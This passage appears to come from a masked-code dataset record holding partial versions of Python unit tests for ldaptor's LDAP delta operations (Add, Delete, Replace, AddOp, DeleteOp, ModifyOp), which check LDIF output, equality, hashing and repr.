408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n 
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n 
self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-2": "<mask token>\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n <mask token>\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n <mask token>\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = 
delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n 
root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the 
have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass 
TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n 
\"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',\n ['bar'])])\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])\"\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n\n def testEquality_Add_True(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = delta.Add('k', ['b', 'c', 'd'])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = 
delta.Add('k', ['b', 'c', 'd'])\n b = delta.Delete('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])\n self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add('k', ['b', 'c', 'd'])\n b = ['b', 'c', 'd']\n self.assertNotEqual(a, b)\n",
"step-3": "<mask token>\n\n\nclass TestModifications(unittest.TestCase):\n\n def setUp(self):\n self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',\n attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],\n 'sn': ['bar'], 'more': ['junk']})\n <mask token>\n\n def testAddNew(self):\n mod = delta.Add('stuff', ['val1', 'val2'])\n mod.patch(self.foo)\n self.assertEqual(self.foo['stuff'], ['val1', 'val2'])\n self.assertEqual(self.foo['cn'], ['foo', 'thud'])\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def testReplace_Delete_NonExisting(self):\n mod = delta.Replace('nonExisting', [])\n mod.patch(self.foo)\n self.assertFalse('stuff' in self.foo)\n self.assertEqual(self.foo['sn'], ['bar'])\n self.assertEqual(self.foo['more'], ['junk'])\n\n\nclass TestModificationOpLDIF(unittest.TestCase):\n\n def testAdd(self):\n m = delta.Add('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'add: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDelete(self):\n m = delta.Delete('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'delete: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testDeleteAll(self):\n m = delta.Delete('foo')\n self.assertEqual(m.asLDIF(), b'delete: foo\\n-\\n')\n\n def testReplace(self):\n m = delta.Replace('foo', ['bar', 'baz'])\n self.assertEqual(m.asLDIF(), b'replace: foo\\nfoo: bar\\nfoo: baz\\n-\\n')\n\n def testReplaceAll(self):\n m = delta.Replace('thud')\n self.assertEqual(m.asLDIF(), b'replace: thud\\n-\\n')\n\n def testAddBase64(self):\n \"\"\"\n LDIF attribute representation is base64 encoded\n if attribute value contains nonprintable characters\n or starts with reserved characters\n \"\"\"\n m = delta.Add('attr', [':value1', 'value\\n\\r2'])\n self.assertEqual(m.asLDIF(),\n b'add: attr\\nattr:: OnZhbHVlMQ==\\nattr:: dmFsdWUKDTI=\\n-\\n')\n\n\nclass OperationTestCase(unittest.TestCase):\n \"\"\"\n Test case for operations on a LDAP tree.\n \"\"\"\n\n 
def getRoot(self):\n \"\"\"\n Returns a new LDAP root for dc=example,dc=com.\n \"\"\"\n return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.\n DistinguishedName('dc=example,dc=com'))\n\n\nclass TestAddOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for `AddOp`.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return the LDIF representation of the operation.\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: dc=example,dc=com\\nchangetype: add\\nfoo: bar\\nfoo: baz\\nquux: thud\\n\\n'\n , result)\n\n def testAddOpEqualitySameEntry(self):\n \"\"\"\n Objects are equal when the have the same LDAP entry.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(first, second)\n\n def testAddOpInequalityDifferentEntry(self):\n \"\"\"\n Objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',\n 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',\n 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testAddOpInequalityNoEntryObject(self):\n \"\"\"\n Objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n sut = delta.AddOp(team_entry)\n self.assertNotEqual(sut, {'foo': ['same', 'attributes']})\n\n def testAddOpHashSimilar(self):\n \"\"\"\n 
Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'same', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def testAddOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'one', 'attributes']})\n second_entry = entry.BaseLDAPEntry(dn=\n 'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [\n 'other', 'attributes']})\n first = delta.AddOp(first_entry)\n second = delta.AddOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testAddOp_DNExists(self):\n \"\"\"\n It fails to perform the `add` operation for an existing entry.\n \"\"\"\n root = self.getRoot()\n root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [\n 'a', 'b'], 'ou': ['HR']})\n hr_entry = entry.BaseLDAPEntry(dn=\n 'ou=Existing Team, dc=example,dc=com', attributes={'foo': [\n 'dont', 'care']})\n sut = delta.AddOp(hr_entry)\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',\n attributes={'bar': ['foo'], 'foo': ['bar']}))\n self.assertEqual(repr(sut),\n \"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))\"\n )\n\n\nclass TestDeleteOpLDIF(OperationTestCase):\n \"\"\"\n Unit tests for DeleteOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It return the LDIF representation of the delete operation.\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n 
result = sut.asLDIF()\n self.assertEqual(b'dn: dc=example,dc=com\\nchangetype: delete\\n\\n',\n result)\n\n def testDeleteOpEqualitySameDN(self):\n \"\"\"\n Objects are equal when the have the same DN.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(first, second)\n\n def testDeleteOpEqualityEqualDN(self):\n \"\"\"\n DeleteOp objects are equal if their DNs are equal.\n \"\"\"\n first_dn = distinguishedname.DistinguishedName(stringValue=\n 'ou=Team,dc=example,dc=com')\n first = delta.DeleteOp(first_dn)\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')\n second = delta.DeleteOp(second_entry)\n third = delta.DeleteOp('ou=Team, dc=example,dc=com')\n self.assertEqual(first, second)\n self.assertEqual(first, third)\n\n def testDeleteOpInequalityDifferentEntry(self):\n \"\"\"\n DeleteOp objects are not equal when the have different LDAP entries.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(first, second)\n\n def testDeleteOpInequalityNoEntryObject(self):\n \"\"\"\n DeleteOp objects is not equal with random objects.\n \"\"\"\n team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n sut = delta.DeleteOp(team_entry)\n self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')\n\n def testDeleteOpHashSimilar(self):\n \"\"\"\n Objects which are equal have the same hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertEqual(hash(first), hash(second))\n\n def 
testDeleteOpHashDifferent(self):\n \"\"\"\n Objects which are not equal have different hash.\n \"\"\"\n first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')\n second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')\n first = delta.DeleteOp(first_entry)\n second = delta.DeleteOp(second_entry)\n self.assertNotEqual(hash(first), hash(second))\n\n def testDeleteOp_DNNotFound(self):\n \"\"\"\n If fail to delete when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.DeleteOp('cn=nope,dc=example,dc=com')\n deferred = sut.patch(root)\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testDeleteOpInvalidDN(self):\n \"\"\"\n Invalid type of DN raises AssertionError\n \"\"\"\n self.assertRaises(AssertionError, delta.DeleteOp, 0)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.DeleteOp('dc=example,dc=com')\n self.assertEqual(repr(sut), \"DeleteOp('dc=example,dc=com')\")\n\n\nclass TestModifyOp(OperationTestCase):\n \"\"\"\n Unit tests for ModifyOp.\n \"\"\"\n\n def testAsLDIF(self):\n \"\"\"\n It will return a LDIF representation of the contained operations.\n \"\"\"\n sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',\n [delta.Add('postaladdress', [\n '123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(\n 'description'), delta.Replace('telephonenumber', [\n '+1 408 555 1234', '+1 408 555 5678']), delta.Delete(\n 'facsimiletelephonenumber', ['+1 408 555 9876'])])\n result = sut.asLDIF()\n self.assertEqual(\n b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\\nchangetype: modify\\nadd: postaladdress\\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\\n-\\ndelete: description\\n-\\nreplace: telephonenumber\\ntelephonenumber: +1 408 555 1234\\ntelephonenumber: +1 408 555 5678\\n-\\ndelete: facsimiletelephonenumber\\nfacsimiletelephonenumber: +1 408 555 9876\\n-\\n\\n'\n , result)\n\n def 
testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertNotEqual('cn=john,dc=example,dc=com', sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(\n 'homeDirectory')])\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n self.assertEqual(first, second)\n self.assertEqual(first.asLDIF(), second.asLDIF(),\n 'LDIF equality is a precondition for valid hash values')\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(\n 'description')])\n second = 
